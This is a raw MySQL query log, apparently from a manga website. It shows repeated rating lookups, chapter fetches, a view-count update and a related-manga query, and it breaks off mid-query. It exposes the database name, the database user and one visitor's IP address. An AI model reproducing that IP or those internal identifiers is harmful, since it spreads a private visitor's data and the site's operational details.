Quit 330655477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330655477 Quit 330655478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330655478 Quit 330655479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330655479 Quit 330655480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330655480 Quit 330655481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330655481 Quit 330655482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330655482 Quit 330655483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330655483 Quit 330655484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330655484 Quit 330655485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330655485 Quit 330655486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330655486 Quit 330655487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330655487 Quit 330655488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330655488 Quit 330655489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330655489 Quit 330655490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330655490 Quit 330655491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330655491 Quit 330655492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330655492 Quit 330655493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330655493 Quit 330655494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330655494 Quit 330655495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330655495 Quit 330655496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330655496 Quit 330655497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330655497 Quit 330655498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330655498 Quit 330655499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330655499 Quit 330655500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330655500 Quit 330655501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330655501 Quit 330655502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330655502 Quit 330655503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330655503 Quit 330655504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330655504 Quit 330655505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330655505 Quit 330655507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330655507 Quit 330655508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330655509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655508 Quit 330655506 Quit 330655509 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6650' 330655510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330655509 Quit 330655510 Quit 330655511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330655512 Query select * FROM chapters where id = '6650' 330655511 Quit 330655512 Quit 330655513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330655514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655513 Quit 330655514 Query select * FROM chapters where manga_id = '127' order by id desc 330655515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330655515 Quit 330655516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330655516 Quit 330655517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330655517 Quit 330655518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330655518 Quit 330655519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330655519 Quit 330655520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330655520 Quit 330655521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330655521 Quit 330655522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330655522 Quit 330655523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330655523 Quit 330655524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330655524 Quit 330655525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330655525 Quit 330655526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330655526 Quit 330655527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330655527 Quit 330655528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330655528 Quit 330655529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330655529 Quit 330655530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330655530 Quit 330655531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330655531 Quit 330655532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330655532 Quit 330655533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330655533 Quit 330655534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330655534 Quit 330655535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330655535 Quit 330655536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330655536 Quit 330655537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330655537 Quit 330655538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330655538 Quit 330655539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330655539 Quit 330655540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330655540 Quit 330655541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330655541 Quit 330655542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330655542 Quit 330655543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330655543 Quit 330655514 Quit 330655544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330655545 Query Update chapters set view=view+1 where id = '6650' 330655544 Quit 330655546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330655546 Quit 330655547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330655545 Quit 330655547 Quit 330655549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330655549 Quit 330655548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655548 Query select * FROM chapters where id = '6650' 330655550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330655550 Quit 330655551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330655552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655548 Quit 330655551 Quit 330655552 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6650' 330655553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330655553 Quit 330655552 Quit 330655554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330655555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655554 Quit 330655555 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '6650', '118.103.255.196', 'mangacherri.com', '2026-02-26 03:29:43', '2026-02-26 03:29:43') 330655556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330655556 Quit 330655557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330655557 Quit 330655555 Quit 330655558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655558 Query select * FROM chapter_images where chapter_id = '6650' 330655559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330655558 Quit 330655559 Quit 330655560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330655560 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330655561 Quit 330655562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330655562 Quit 330655563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330655563 Quit 330655564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330655564 Quit 330655565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330655565 Quit 330655566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330655566 Quit 330655567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330655567 Quit 330655568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330655568 Quit 330655569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330655569 Quit 330655570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330655570 Quit 330655571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330655571 Quit 330655572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330655572 Quit 330655573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330655573 Quit 330655574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330655574 Quit 330655575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330655575 Quit 330655560 Quit 330655576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330655577 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330655576 Quit 330655578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330655578 Quit 330655579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330655579 Quit 330655580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330655580 Quit 330655581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330655581 Quit 330655582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330655582 Quit 330655583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330655583 Quit 330655584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330655584 Quit 330655585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330655585 Quit 330655586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330655586 Quit 330655587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330655587 Quit 330655588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330655588 Quit 330655589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330655589 Quit 330655590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330655590 Quit 330655591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330655591 Quit 330655592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330655592 Quit 330655593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330655593 Quit 330655594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330655594 Quit 330655595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330655595 Quit 330655596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330655596 Quit 330655597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330655597 Quit 330655598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330655598 Quit 330655599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330655599 Quit 330655600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330655600 Quit 330655601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330655601 Quit 330655602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330655602 Quit 330655603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330655603 Quit 330655604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330655604 Quit 330655605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330655605 Quit 330655606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330655606 Quit 330655607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330655607 Quit 330655608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330655608 Quit 330655609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330655609 Quit 330655610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330655610 Quit 330655611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330655611 Quit 330655612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330655612 Quit 330655613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330655613 Quit 330655614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330655614 Quit 330655615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330655615 Quit 330655616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330655616 Quit 330655617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330655617 Quit 330655618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330655618 Quit 330655619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330655619 Quit 330655620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330655620 Quit 330655621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330655621 Quit 330655622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330655622 Quit 330655623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330655623 Quit 330655624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330655624 Quit 330655625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330655625 Quit 330655626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330655626 Quit 330655627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330655627 Quit 330655628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330655628 Quit 330655629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330655629 Quit 330655630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655630 Query select count(id) as total_rating, (sum(rating) / count(id)) as 